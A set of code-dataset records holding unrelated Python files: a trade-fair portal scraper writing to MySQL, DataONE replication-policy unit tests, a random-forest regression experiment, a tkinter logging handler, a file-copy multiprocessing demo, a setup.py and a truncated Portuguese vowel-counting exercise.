urllib.request.urlopen(offers_page_req)\r\n offers_page_html = offers_page.read()\r\n offers_page.close()\r\n offers_page_soup = BeautifulSoup(offers_page_html, \"html.parser\")\r\n category_name = offers_page_soup.select('small')\r\n category_name = category_name[0].text.strip()\r\n category_name = category_name.replace('Wyniki wyszukiwania dla frazy: \\\"\\\"\\n w kategorii: \\\"', '')\r\n category_name = category_name[:-1]\r\n sql_data_categories = (category_id, category_name)\r\n mycursor.execute(sqlFormula_categories, sql_data_categories)\r\n promo_list1 = offers_page_soup.find(\"div\", {\"id\": \"offers\"})\r\n try:\r\n promo_list2 = promo_list1.findAll(\"div\", {\"class\": \"col-md-6 mt-2\"})\r\n except AttributeError:\r\n continue\r\n for row in promo_list2:\r\n offers_page_url2 = row.a[\"href\"]\r\n offers_page_req2 = urllib.request.Request(offers_page_url2, headers={'User-Agent': \"Mozilla/5.0\"})\r\n offers_page2 = urllib.request.urlopen(offers_page_req2)\r\n offers_page_html2 = offers_page2.read()\r\n offers_page2.close()\r\n offers_page_soup2 = BeautifulSoup(offers_page_html2, \"html.parser\")\r\n name = offers_page_soup2.find(\"h1\", {\"class\": \"line-after\"}).text\r\n text_right = offers_page_soup2.select('.col-md-12 .text-right')\r\n trade_portaltargowy_site = text_right[0].a[\"href\"]\r\n text_right = text_right[0].text\r\n # print(text_right[0].text.strip())\r\n text_right = text_right.split(\"|\")\r\n trade_fair = text_right[0].strip()\r\n trade_fair = trade_fair.replace('Targi: ', '')\r\n announce_date_valid = text_right[1]\r\n announce_date_valid = announce_date_valid.replace('Ogłoszenie ważne\\n ', '').strip()\r\n announce_type = text_right[2].strip()\r\n description = offers_page_soup2.select('.col-md-12 .col-md-12')\r\n description = description[0].text.strip()\r\n description = description.replace('Opis ogłoszenia:\\n', '')\r\n exhibitor_data1 = offers_page_soup2.select('br+ .row .col-md-12')\r\n exhibitor_data1 = exhibitor_data1[0].text.strip()\r\n if exhibitor_data1 == \"Galeria ogłoszenia:\":\r\n exhibitor_data2 = offers_page_soup2.select('.col-md-12 .col-md-8')\r\n try:\r\n exhibitor_data2 = exhibitor_data2[0].text.strip()\r\n except IndexError:\r\n exhibitor_data3 = offers_page_soup2.select('.row:nth-child(9) .col-md-12')\r\n exhibitor_data3 = exhibitor_data3[0].text.strip()\r\n exhibitor_data3 = exhibitor_data3.split(\"\\n\")\r\n exhibitor_name = exhibitor_data3[1].strip()\r\n # print(exhibitor_name)\r\n exhibitor_address = exhibitor_data3[3].strip() + exhibitor_data3[4].strip()\r\n exhibitor_address = exhibitor_address.replace('Adres: ', '')\r\n # print(exhibitor_address)\r\n exhibitor_www = exhibitor_data3[5].strip()\r\n exhibitor_www = exhibitor_www.replace('WWW: ', '')\r\n # print(exhibitor_www)\r\n exhibitor_telephone = exhibitor_data3[-1].strip()\r\n if exhibitor_telephone.startswith(\"WWW\"):\r\n exhibitor_telephone = None\r\n # print(exhibitor_telephone)\r\n exhibitor_email = None\r\n else:\r\n exhibitor_data2 = exhibitor_data2.split(\"\\n\")\r\n exhibitor_name = exhibitor_data2[2].strip()\r\n # print(exhibitor_name)\r\n exhibitor_address = exhibitor_data2[5].strip()\r\n exhibitor_address = exhibitor_address.replace('Adres: ', '')\r\n # print(exhibitor_address)\r\n exhibitor_www = exhibitor_data2[7].strip()\r\n exhibitor_www = exhibitor_www.replace('WWW: ', '')\r\n # print(exhibitor_www)\r\n exhibitor_telephone = exhibitor_data2[8].strip()\r\n # print(exhibitor_telephone)\r\n exhibitor_email = exhibitor_data2[10].strip()\r\n exhibitor_email = exhibitor_email.replace('E-mail: ', '')\r\n # print(exhibitor_email)\r\n else:\r\n exhibitor_data1 = exhibitor_data1.split(\"\\n\")\r\n exhibitor_name = exhibitor_data1[1].strip()\r\n # print(exhibitor_name)\r\n exhibitor_address = exhibitor_data1[3].strip() + exhibitor_data1[4].strip()\r\n exhibitor_address = exhibitor_address.replace('Adres: ', '')\r\n # print(exhibitor_address)\r\n exhibitor_www = exhibitor_data1[5].strip()\r\n exhibitor_www = exhibitor_www.replace('WWW: ', '')\r\n # print(exhibitor_www)\r\n exhibitor_telephone = exhibitor_data1[-1].strip()\r\n exhibitor_telephone = exhibitor_telephone.replace('Telefon: ', '')\r\n if exhibitor_telephone.startswith(\"WWW\"):\r\n exhibitor_telephone = None\r\n # print(exhibitor_telephone)\r\n exhibitor_email = None\r\n sql_data_offers_data = (offer_id, name, trade_portaltargowy_site, trade_fair, announce_date_valid, announce_type, description, exhibitor_name, exhibitor_address, exhibitor_www, exhibitor_telephone, exhibitor_email, category_id)\r\n mycursor.execute(sqlFormula_offers_data, sql_data_offers_data)\r\n offer_id = offer_id + 1\r\n page_number = 1\r\n while True:\r\n print(\"category number \" + str(x + 1))\r\n print(\"page number \" + str(page_number))\r\n exhibitor_page_url = 'https://portaltargowy.pl/wystawcy?category=' + str(x + 1) + '&page=' + str(page_number)\r\n exhibitor_page_req = urllib.request.Request(exhibitor_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n exhibitor_page = urllib.request.urlopen(exhibitor_page_req)\r\n exhibitor_page_html = exhibitor_page.read()\r\n exhibitor_page.close()\r\n exhibitor_page_soup = BeautifulSoup(exhibitor_page_html, \"html.parser\")\r\n exhibitor_list = exhibitor_page_soup.findAll(\"div\", {\"class\": \"col-lg-8 mt-2\"})\r\n if not exhibitor_list:\r\n break\r\n for row in exhibitor_list:\r\n exhibitor_page_url = row.a[\"href\"]\r\n exhibitor_page_req = urllib.request.Request(exhibitor_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n exhibitor_page = urllib.request.urlopen(exhibitor_page_req)\r\n exhibitor_page_html = exhibitor_page.read()\r\n exhibitor_page.close()\r\n exhibitor_page_soup = BeautifulSoup(exhibitor_page_html, \"html.parser\")\r\n exhibitor_data = exhibitor_page_soup.select('.col-md-8 .col-md-8')\r\n exhibitor_data = exhibitor_data[0].text.strip()\r\n exhibitor_data = exhibitor_data.split(\"\\n\")\r\n for y in range(4):\r\n try:\r\n if exhibitor_data[y].strip().startswith('Pełna nazwa'):\r\n exhibitor_full_name = exhibitor_data[y].strip()\r\n exhibitor_full_name = exhibitor_full_name.replace('Pełna nazwa: ', '')\r\n exhibitor_full_name_mysql = (exhibitor_full_name,)\r\n print(exhibitor_full_name)\r\n except IndexError:\r\n continue\r\n try:\r\n if exhibitor_data[y].strip().startswith('Adres'):\r\n exhibitor_address = exhibitor_data[y].strip()\r\n exhibitor_address = exhibitor_address.replace('Adres: ', '')\r\n exhibitor_address_mysql = (exhibitor_address,)\r\n print(exhibitor_address)\r\n except IndexError:\r\n continue\r\n try:\r\n if exhibitor_data[y].strip().startswith('WWW'):\r\n exhibitor_www = exhibitor_data[y].strip()\r\n exhibitor_www = exhibitor_www.replace('WWW: ', '')\r\n print(exhibitor_www)\r\n except IndexError:\r\n continue\r\n try:\r\n if exhibitor_data[y].strip().startswith('Telefon'):\r\n exhibitor_telephone = exhibitor_data[y].strip()\r\n exhibitor_telephone = exhibitor_telephone.replace('Telefon: ', '')\r\n print(exhibitor_telephone)\r\n except IndexError:\r\n continue\r\n try:\r\n if exhibitor_data[y].strip().startswith('E-mail'):\r\n exhibitor_email = exhibitor_data[y].strip()\r\n exhibitor_email = exhibitor_email.replace('E-mail: ', '')\r\n print(exhibitor_email)\r\n except IndexError:\r\n continue\r\n exhibitor_logo = exhibitor_page_soup.select('.logo-exhibitor img')\r\n exhibitor_logo = exhibitor_logo[0][\"src\"]\r\n print(exhibitor_logo)\r\n select_exists_exhibitor_full_name_formula = \"SELECT EXISTS(SELECT * from \" + basic_table_name_exhibitors + \" WHERE exhibitor_full_name = \" + \"%s\" + \")\"\r\n mycursor.execute(select_exists_exhibitor_full_name_formula, exhibitor_full_name_mysql)\r\n exists_exhibitor_full_name_condition = mycursor.fetchone()\r\n exists_exhibitor_full_name_condition = exists_exhibitor_full_name_condition[0]\r\n print(\"existence condition name: \" + str(exists_exhibitor_full_name_condition))\r\n select_exists_exhibitor_address_formula = \"SELECT EXISTS(SELECT * from \" + basic_table_name_exhibitors + \" WHERE exhibitor_address = \" + \"%s\" + \")\"\r\n mycursor.execute(select_exists_exhibitor_address_formula, exhibitor_address_mysql)\r\n exists_exhibitor_address_condition = mycursor.fetchone()\r\n exists_exhibitor_address_condition = exists_exhibitor_address_condition[0]\r\n print(\"existence condition address: \" + str(exists_exhibitor_address_condition))\r\n if exists_exhibitor_full_name_condition and exists_exhibitor_address_condition:\r\n print(\"EXIST\")\r\n select_existing_exhibitor_id_formula = \"SELECT exhibitor_id FROM \" + basic_table_name_exhibitors + \" WHERE exhibitor_full_name = %s\"\r\n mycursor.execute(select_existing_exhibitor_id_formula, exhibitor_full_name_mysql)\r\n existing_exhibitor_id = mycursor.fetchone()\r\n existing_exhibitor_id = existing_exhibitor_id[0]\r\n sql_data_cat_j_exh = (category_id, existing_exhibitor_id)\r\n else:\r\n print(\"NOT EXIST\")\r\n sql_data_exhibitors = (exhibitor_id, exhibitor_full_name, exhibitor_address, exhibitor_www, exhibitor_telephone, exhibitor_email, exhibitor_logo)\r\n mycursor.execute(sqlFormula_exhibitors, sql_data_exhibitors)\r\n sql_data_cat_j_exh = (category_id, exhibitor_id)\r\n mycursor.execute(sqlFormula_cat_j_exh, sql_data_cat_j_exh)\r\n if not (exists_exhibitor_full_name_condition and exists_exhibitor_address_condition):\r\n exhibitor_id = exhibitor_id + 1\r\n exhibitor_full_name = None\r\n exhibitor_address = None\r\n exhibitor_www = None\r\n exhibitor_telephone = None\r\n exhibitor_email = None\r\n exhibitor_full_name_mysql = None\r\n exhibitor_address_mysql = None\r\n page_number = page_number + 1\r\n page_number = 1\r\n while True:\r\n print(\"category number \" + str(x + 1))\r\n print(\"page number \" + str(page_number))\r\n event_page_url = 'https://portaltargowy.pl/targi?category=' + str(category_id) + '&page=' + str(page_number)\r\n event_page_req = urllib.request.Request(event_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n event_page = urllib.request.urlopen(event_page_req)\r\n event_page_html = event_page.read()\r\n event_page.close()\r\n event_page_soup = BeautifulSoup(event_page_html, \"html.parser\")\r\n event_list = event_page_soup.findAll(\"div\", {\"class\": \"col-lg-8 col-md-6\"})\r\n if not event_list:\r\n break\r\n for row in event_list:\r\n event_page_url = row.a[\"href\"]\r\n event_page_req = urllib.request.Request(event_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n event_page = urllib.request.urlopen(event_page_req)\r\n event_page_html = event_page.read()\r\n event_page.close()\r\n event_page_soup = BeautifulSoup(event_page_html, \"html.parser\")\r\n event_full_name = event_page_soup.select('small')\r\n event_full_name = event_full_name[0].text\r\n event_full_name = event_full_name.replace('Pełna nazwa targów: ', '')\r\n event_full_name_mysql = (event_full_name,)\r\n print(event_full_name)\r\n event_logo = event_page_soup.select('.event-box-single img')\r\n event_logo = event_logo[0][\"src\"]\r\n print(event_logo)\r\n event_date = event_page_soup.select('.col-sm-6:nth-child(1)')\r\n event_date = event_date[0].text.strip()\r\n event_date = event_date.split(\"\\n\")\r\n event_date = event_date[1].strip() + \" \" + event_date[2].strip()\r\n print(event_date)\r\n event_localization = event_page_soup.select('.col-sm-6:nth-child(2)')\r\n event_localization = event_localization[0].text.strip()\r\n event_localization = event_localization.split(\"\\n\")\r\n event_localization = event_localization[1].strip()\r\n event_localization_mysql = (event_localization,)\r\n print(event_localization)\r\n event_www = event_page_soup.select('.col-sm-6 a')\r\n if not event_www:\r\n event_www = None\r\n else:\r\n event_www = event_www[0][\"href\"]\r\n print(event_www)\r\n event_description = event_page_soup.select('.row:nth-child(5) .col-lg-12')\r\n event_description = event_description[0].text\r\n event_description = event_description.split('\\n', 2)[-1].strip()\r\n print(event_description)\r\n event_page_url = event_page_soup.find(\"div\", {\"class\": \"col-lg-8 col-sm-8 col-xs-12\"})\r\n event_page_url = event_page_url.a[\"href\"]\r\n event_page_url_mysql = (event_page_url,)\r\n select_formula = \"SELECT organizer_id FROM \" + basic_table_name_organizers + \" WHERE organizer_page_url = %s\"\r\n mycursor.execute(select_formula, event_page_url_mysql)\r\n organizer_id_event = mycursor.fetchone()\r\n organizer_id_event = organizer_id_event[0]\r\n print(organizer_id_event)\r\n select_exists_event_full_name_formula = \"SELECT EXISTS(SELECT * from \" + basic_table_name_events + \" WHERE event_full_name = \" + \"%s\" + \")\"\r\n mycursor.execute(select_exists_event_full_name_formula, event_full_name_mysql)\r\n exists_event_full_name_condition = mycursor.fetchone()\r\n exists_event_full_name_condition = exists_event_full_name_condition[0]\r\n print(\"existence condition name: \" + str(exists_event_full_name_condition))\r\n select_exists_event_localization_formula = \"SELECT EXISTS(SELECT * from \" + basic_table_name_events + \" WHERE event_localization = \" + \"%s\" + \")\"\r\n mycursor.execute(select_exists_event_localization_formula, event_localization_mysql)\r\n exists_event_localization_condition = mycursor.fetchone()\r\n exists_event_localization_condition = exists_event_localization_condition[0]\r\n print(\"existence condition localization: \" + str(exists_event_localization_condition))\r\n if exists_event_full_name_condition and exists_event_localization_condition:\r\n print(\"EXIST\")\r\n select_existing_event_id_formula = \"SELECT event_id FROM \" + basic_table_name_events + \" WHERE event_full_name = %s\"\r\n mycursor.execute(select_existing_event_id_formula, event_full_name_mysql)\r\n existing_event_id = mycursor.fetchone()\r\n existing_event_id = existing_event_id[0]\r\n sql_data_cat_j_ev = (category_id, existing_event_id)\r\n else:\r\n print(\"NOT EXIST\")\r\n sql_data_events = (event_id, event_full_name, event_logo, event_date, event_localization, event_www, event_description, organizer_id_event)\r\n mycursor.execute(sqlFormula_events, sql_data_events)\r\n sql_data_cat_j_ev = (category_id, event_id)\r\n mycursor.execute(sqlFormula_cat_j_ev, sql_data_cat_j_ev)\r\n if not (exists_event_full_name_condition and exists_event_localization_condition):\r\n event_id = event_id + 1\r\n page_number = page_number + 1\r\nmydb.commit()\r\n","sub_path":"portal_targowy.py","file_name":"portal_targowy.py","file_ext":"py","file_size_in_byte":26233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307012628","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This work was created by participants in the DataONE project, and is\n# jointly copyrighted by participating institutions in DataONE. For\n# more information on DataONE, see our web site at http://dataone.org.\n#\n# Copyright 2009-2016 DataONE\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Stdlib\nimport unittest\nimport logging\nimport sys\nimport StringIO\n\n# D1\nfrom d1_common.test_case_with_url_compare import TestCaseWithURLCompare # noqa: E402\n\n# App\nimport d1_client_cli.impl.replication_policy as replication_policy\n\n#===============================================================================\n\n\nclass TestReplicationPolicy(TestCaseWithURLCompare):\n def setUp(self):\n pass\n\n def test_010(self):\n \"\"\"The replication policy object can be instantiated\"\"\"\n self.assertNotEquals(None, replication_policy.ReplicationPolicy())\n\n def test_020(self):\n \"\"\"After instatiation, get_preferred() returns empty list.\"\"\"\n s = replication_policy.ReplicationPolicy()\n self.assertFalse(len(s.get_preferred()))\n\n def test_022(self):\n \"\"\"After instatiation, get_blocked() returns empty list.\"\"\"\n s = replication_policy.ReplicationPolicy()\n self.assertFalse(len(s.get_blocked()))\n\n def test_030(self):\n \"\"\"add_preferred() retains added MN\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.add_preferred(['preferred_mn_1', 'preferred_mn_2', 'preferred_mn_3'])\n self.assertEqual(3, len(s.get_preferred()))\n self.assertTrue('preferred_mn_1' in s.get_preferred())\n self.assertTrue('preferred_mn_2' in s.get_preferred())\n self.assertTrue('preferred_mn_3' in s.get_preferred())\n\n def test_032(self):\n \"\"\"add_blocked() retains added MN\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.add_blocked(['blocked_mn_1', 'blocked_mn_2', 'blocked_mn_3'])\n self.assertEqual(3, len(s.get_blocked()))\n self.assertTrue('blocked_mn_1' in s.get_blocked())\n self.assertTrue('blocked_mn_2' in s.get_blocked())\n self.assertTrue('blocked_mn_3' in s.get_blocked())\n\n def test_040(self):\n \"\"\"add_preferred() followed by add_blocked() switches item from preferred to blocked\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.add_preferred(['preferred_mn'])\n self.assertFalse('preferred_mn' in s.get_blocked())\n s.add_blocked(['preferred_mn'])\n self.assertTrue('preferred_mn' in s.get_blocked())\n\n def test_045(self):\n \"\"\"add_blocked() followed by add_preferred() switches item from blocked to preferred\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.add_preferred(['blocked_mn'])\n self.assertFalse('blocked_mn' in s.get_blocked())\n s.add_blocked(['blocked_mn'])\n self.assertTrue('blocked_mn' in s.get_blocked())\n\n def test_060(self):\n \"\"\"Replication is allowed by default.\"\"\"\n s = replication_policy.ReplicationPolicy()\n self.assertTrue(s.get_replication_allowed())\n\n def test_070(self):\n \"\"\"set_replication_allowed() is retained and can be retrieved with get_replication_policy()\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.set_replication_allowed(True)\n self.assertTrue(s.get_replication_allowed())\n s.set_replication_allowed(False)\n self.assertFalse(s.get_replication_allowed())\n\n def test_080(self):\n \"\"\"number_of_replicas can be retrieved and is 0 by default\"\"\"\n s = replication_policy.ReplicationPolicy()\n self.assertEqual(3, s.get_number_of_replicas()) # 3 by default\n\n def test_090(self):\n \"\"\"set_number_of_replicas() is retained and can be retrieved with get_number_of_replicas()\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.set_number_of_replicas(5)\n self.assertEqual(5, s.get_number_of_replicas())\n s.set_number_of_replicas(10)\n self.assertEqual(10, s.get_number_of_replicas())\n\n def test_100(self):\n \"\"\"set_replication_allowed(False) implicitly sets number_of_replicas to 0\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.set_number_of_replicas(5)\n self.assertEqual(5, s.get_number_of_replicas())\n s.set_replication_allowed(False)\n self.assertEqual(0, s.get_number_of_replicas())\n\n def test_110(self):\n \"\"\"set_number_of_replicas(0) implicitly sets replication_allowed to False\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.set_replication_allowed(True)\n self.assertTrue(s.get_replication_allowed())\n s.set_number_of_replicas(0)\n self.assertFalse(s.get_replication_allowed())\n\n def test_120(self):\n \"\"\"print_replication_policy() is available and appears to work\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.add_preferred(['preferred_mn_1'])\n s.add_preferred(['preferred_mn_2'])\n s.add_preferred(['preferred_mn_3'])\n s.add_blocked(['blocked_mn_1'])\n s.add_blocked(['blocked_mn_2'])\n s.add_blocked(['blocked_mn_3'])\n s.set_number_of_replicas(5)\n s.set_replication_allowed(True)\n old = sys.stdout\n sys.stdout = StringIO.StringIO()\n # run print\n s.print_replication_policy()\n ## release stdout\n out = sys.stdout.getvalue()\n sys.stdout = old\n # validate\n self.assertTrue(len(out) > 100)\n self.assertTrue('preferred member nodes' in out)\n self.assertTrue('blocked member nodes' in out)\n\n def test_130(self):\n \"\"\"clear() sets everything to default\"\"\"\n s = replication_policy.ReplicationPolicy()\n s.add_preferred(['preferred_mn_1'])\n s.add_preferred(['preferred_mn_2'])\n s.add_blocked(['blocked_mn_1'])\n s.add_blocked(['blocked_mn_2'])\n s.set_number_of_replicas(5)\n s.set_replication_allowed(True)\n s.clear()\n self.assertTrue(not len(s.get_preferred()))\n self.assertTrue(not len(s.get_blocked()))\n self.assertTrue(s.get_replication_allowed())\n self.assertEqual(s.get_number_of_replicas(), 3)\n\n\n#===============================================================================\n\n\ndef log_setup():\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)-8s %(message)s', '%y/%m/%d %H:%M:%S'\n )\n console_logger = logging.StreamHandler(sys.stdout)\n console_logger.setFormatter(formatter)\n logging.getLogger('').addHandler(console_logger)\n\n\ndef main():\n import optparse\n\n log_setup()\n\n # Command line opts.\n parser = optparse.OptionParser()\n parser.add_option('--debug', action='store_true', default=False, dest='debug')\n parser.add_option(\n '--test', action='store', default='', dest='test', help='run a single test'\n )\n\n (options, arguments) = parser.parse_args()\n\n if options.debug:\n logging.getLogger('').setLevel(logging.DEBUG)\n else:\n logging.getLogger('').setLevel(logging.ERROR)\n\n s = TestReplicationPolicy\n s.options = options\n\n if options.test != '':\n suite = unittest.TestSuite(map(s, [options.test]))\n else:\n suite = unittest.TestLoader().loadTestsFromTestCase(s)\n\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"d1_client_cli/src/d1_client_cli/tests/test_replication_policy.py","file_name":"test_replication_policy.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"48719198","text":"import numpy as np # linear algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\r\nimport matplotlib.pyplot as plt\r\n\r\n#from sklearn.tree import DecisionTreeRegressor\r\n#from sklearn.ensemble import AdaBoostRegressor\r\n#from sklearn.ensemble import GradientBoostingRegressor\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.multioutput import MultiOutputRegressor\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\"\"\"\r\nwith pd.HDFStore(\"C:\\\\Users\\\\4126694\\\\2sig-kaggle\\\\input\\\\train.h5\", \"r\") as train:\r\n # Note that the \"train\" dataframe is the only dataframe in the file\r\n df = train.get(\"train\")\r\n \r\nids = df[\"id\"].unique()\r\nids_in = {}\r\nfor x in ids:\r\n time = df[df[\"id\"] == x].timestamp\r\n if time.min() > 100 and time.max() < 1812:\r\n ids_in[x] = (time.min(), time.max())\r\n\r\ninstrument = 52\r\ndfi = df[df[\"id\"] == instrument]my\r\n\r\npd.set_option('mode.chained_assignment',None)\r\ndfi.loc[:,\"cumprod\"] = (1+dfi[\"y\"]).cumprod()\r\n\r\ncols = [x for x in dfi.columns.values if x not in [\"id\", \"timestamp\",\"y\",\"cumprod\"]]\r\nl = len(cols)\r\n\r\ndfj = dfi.fillna(mean_values)\r\ntarget = dfj.pop('y')\r\nts = dfj.pop('timestamp')\r\ndfj = dfi.drop([\"id\",\"y\",\"cumprod\"],axis=1)\r\ndfj=dfj.fillna(0)\r\nfeatures = dfj.values\r\n\"\"\"\r\ndef _load_data(data, n_prev = 61): \r\n \"\"\"\r\n data should be pd.DataFrame()\r\n \"\"\"\r\n\r\n docX, docY = [], []\r\n for i in range(len(data)-n_prev):\r\n docX.append(data.iloc[i:i+n_prev].as_matrix())\r\n docY.append(data.iloc[i+n_prev].as_matrix())\r\n alsX = np.array(docX)\r\n alsY = np.array(docY)\r\n\r\n return alsX, alsY\r\n\r\n\r\ndef train_test_split(data, test_size=0.5): \r\n \"\"\"\r\n This just splits data to training and testing parts\r\n \"\"\" \r\n df = pd.DataFrame(data) \r\n ntrn = round(len(df) * (1 - test_size))\r\n ntrn = int(ntrn)\r\n tt = df.iloc[0:ntrn]\r\n vv = df.iloc[ntrn:]\r\n \r\n train = np.array(tt)\r\n val = np.array(vv)\r\n\r\n\r\n return (train, val)\r\n\r\n(xtrain, xval) = train_test_split(features)\r\n(ytrain, yval) = train_test_split(target) \r\n(tstrain, tsval) = train_test_split(ts) \r\n\r\n\r\nrng = np.random.RandomState(1)\r\n#regr_1 = DecisionTreeRegressor(max_depth=4)\r\n#regr_2 = AdaBoostRegressor(DecisionTreeRegressor(max_depth=5), n_estimators=500, random_state=rng)\r\n#regr_3 = GradientBoostingRegressor(n_estimators=500, learning_rate=0.1, max_depth=5, random_state=rng, loss='ls')\r\nregr_4 = MultiOutputRegressor(RandomForestRegressor(n_estimators=300, max_depth=10, random_state=0))\r\nregr_5 = RandomForestRegressor(n_estimators=300, max_depth=10, random_state=rng)\r\n\r\n\r\n#regr_1.fit(features, target)\r\n#regr_2.fit(xtrain, ytrain)\r\n#regr_3.fit(xtrain, ytrain)\r\nregr_4.fit(xtrain, ytrain)\r\nregr_5.fit(xtrain, ytrain)\r\n\r\n#y_1 = regr_1.predict(features)\r\n#y_2 = regr_2.predict(xval)\r\n#y_3 = regr_3.predict(xval)\r\ny_4 = regr_4.predict(xval)\r\ny_5 = regr_5.predict(xval)\r\n\r\n\r\n#mse2 = mean_squared_error(yval, y_2)\r\n#mse3 = mean_squared_error(yval, y_3)\r\nmse4 = mean_squared_error(yval, y_4)\r\nmse5 = mean_squared_error(yval, y_5)\r\n\r\nprint(\"MSE4: %.6f MSE5: %.6f\" % (mse4,mse5))\r\n\r\nplt.figure()\r\nplt.figure(figsize=(15,10))\r\nplt.plot(ts, target,c=\"k\",label=\"training samples\")\r\nplt.plot(tsval, y_4, c=\"g\", label=\"ADABoost500\", linewidth=2)\r\nplt.plot(tsval, y_5, c=\"r\", label=\"GradBoost500\", linewidth=2)\r\n\r\n","sub_path":"2sigv2.py","file_name":"2sigv2.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373247973","text":"import logging\nimport tkinter as tk\nfrom auxiclean import MAINFORMATTER\n\n\nclass TextHandler(logging.Handler):\n # This class allows you to log to a Tkinter Text or ScrolledText widget\n # Adapted from Moshe Kaplan:\n # https://gist.github.com/moshekaplan/c425f861de7bbf28ef06\n\n def __init__(self, text):\n # run the regular Handler __init__\n super().__init__()\n # Store a reference to the Text it will log to\n self.setFormatter(MAINFORMATTER)\n self.text = text\n\n def emit(self, record):\n msg = self.format(record)\n\n def append():\n self.text.configure(state='normal')\n self.text.insert(tk.END, msg + '\\n')\n self.text.configure(state='disabled')\n # Autoscroll to the bottom\n self.text.yview(tk.END)\n # This is necessary because we can't modify the Text from other threads\n self.text.after(0, append)\n","sub_path":"auxiclean/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238738808","text":"import os\nfrom multiprocessing import Process\nfrom time import sleep\nfilename = \"./timg.jpeg\"\n# 获取文件的大小\nsize = os.path.getsize(filename)\n# 如果子进程使用父进程的对象,那么相互之间有偏移量的影响\n# f = open(filename, 'rb')\n# 复制前半部分\n\n\ndef copy1():\n f = open(filename, 'rb')\n # sleep(1)\n n = size // 2\n fw = open('1.jpeg', 'wb')\n\n while True:\n if n < 1024:\n data = f.read(n)\n fw.write(data)\n break\n data = f.read(1024)\n fw.write(data)\n n -= 1024\n\n f.close()\n fw.close()\n\n\n# 复制后半部分\ndef copy2():\n f = open(filename, 'rb')\n fw = open('2.jpeg', 'wb')\n f.seek(size // 2, 0)\n while True:\n data = f.read(1024)\n if not data:\n break\n fw.write(data)\n fw.close()\n f.close()\n\n\np1 = Process(target=copy1) # args=('timg.jpeg',)\np2 = Process(target=copy2) # args=('timg.jpeg',))\np1.start()\np2.start()\np1.join()\np2.join()\n","sub_path":"aid1807习题总结/process/process4.py","file_name":"process4.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60170294","text":"#!/usr/bin/env python\nimport os\nfrom setuptools import setup\n\nPACKAGE = 'pypi-tools'\nVERSION = '0.0.2'\n\nsetup(\n name = 'pypi-tools',\n version = VERSION,\n description = 'Command line PyPI search tool',\n author = 'Grigoriy Petukhov',\n author_email = 'lorien@lorien.name',\n url = 'http://bitbucket.org/lorien/pypi-tools',\n py_modules = ['pypi'],\n scripts = ['pypi'],\n license = \"BSD\",\n keywords = \"django application development shortcuts helpers\",\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n)\n","sub_path":"pypi_install_script/pypi-tools-0.0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540987419","text":"frase = str(input('Digite uma frase: ')).upper()\n\na = frase.count('A')\ne = frase.count('E')\ni = frase.count('I')\no = frase.count('O')\nu = frase.count('U')\n\ntotal_de_vogais = a + e + i + o + u\n\nprint(f'O texto contém um total de {total_de_vogais} vogais.')\n\nposicoesA = list()\nposicoesE = list()\nposicoesI = list()\nposicoesO = list()\nposicoesU = list()\n\nfor posicao, vogal in enumerate(frase):\n\n if vogal == 'A':\n posicoesA.append(posicao + 1)\n if vogal == 'E':\n posicoesE.append(posicao + 1)\n if vogal == 'I':\n posicoesI.append(posicao + 1)\n if vogal == 'O':\n posicoesO.append(posicao + 1)\n if vogal == 'U':\n posicoesU.append(posicao + 1)\n\nif posicoesA == []:\n print('A vogal \"A\" não se encontra na frase.')\nelse:\n print(f'A vogal \"A\" se encontra na(s) posição(ões) {posicoesA}.')\nif posicoesE == []:\n print('A vogal \"e\" não se encontra na frase.')\nelse:\n print(f'A vogal \"E\" se encontra na(s) posição(ões) {posicoesE}.')\nif posicoesI == []:\n print('A vogal \"I\" não se encontra na frase.')\nelse:\n print(f'A vogal \"I\" se encontra na(s) posição(ões) {posicoesI}.')\nif posicoesO == []:\n print('A vogal \"O\" não se encontra na frase.')\nelse:\n print(f'A vogal \"O\" se encontra na(s) posição(ões) {posicoesO}.')\nif posicoesU == []:\n print('A vogal \"U\" não se encontra na 